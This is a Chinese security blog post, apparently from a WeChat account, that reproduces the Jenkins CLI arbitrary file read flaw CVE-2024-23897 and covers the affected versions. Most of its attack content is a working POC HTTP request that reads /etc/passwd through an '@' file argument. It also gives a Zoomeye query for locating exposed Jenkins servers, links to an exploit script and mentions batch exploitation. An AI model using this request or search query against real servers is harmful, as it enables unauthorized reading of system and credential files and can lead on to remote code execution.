声明:该公众号分享的安全工具和项目均来源于网络,仅供安全研究与学习之用,如用于其他用途,由使用者承担全部法律及连带责任,与工具作者和本公众号无关
现在只对常读和星标的公众号才展示大图推送,建议大家把猫蛋儿安全“设为星标”,否则可能看不到了!
漏洞简介
Jenkins有一个内置的命令行界面(CLI),可从脚本或shell环境访问Jenkins。处理CLI命令时,Jenkins使用args4j库解析Jenkins控制器上的命令参数和选项。由于Jenkins受影响版本中默认启用其CLI命令解析器的一个功能,特定的解析器功能expandAtFiles可将@参数中后跟文件路径的字符替换为文件内容,可能导致威胁者读取Jenkins控制器文件系统上的任意文件,或可以进一步利用该漏洞在多种情况下导致远程代码执行。
影响范围
Jenkins 版本<= 2.441Jenkins 版本<= LTS 2.426.2
搜索引擎
Zoomeye: app:"Jenkins"
复现过程
2.漏洞比较简单,直接上POC了。
POST /cli?remoting=false HTTP/1.1Host: 127.1.231.87Accept-Encoding: identityContent-Length: 57Session: 44ae3a15-9ae2-4459-a3b8-e8daefe2cc53Side: uploadContent-type: application/octet-stream.......help.......@/etc/passwd.......GBK.......zh_CN.....
3.发送POC
https://github.com/h4x0r-dz/CVE-2024-23897/blob/main/CVE-2024-23897.py
批量POC
原文始发于微信公众号(猫蛋儿安全):【漏洞复现】Jenkins任意文件读取漏洞(CVE-2024-23897) 附【POC】
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论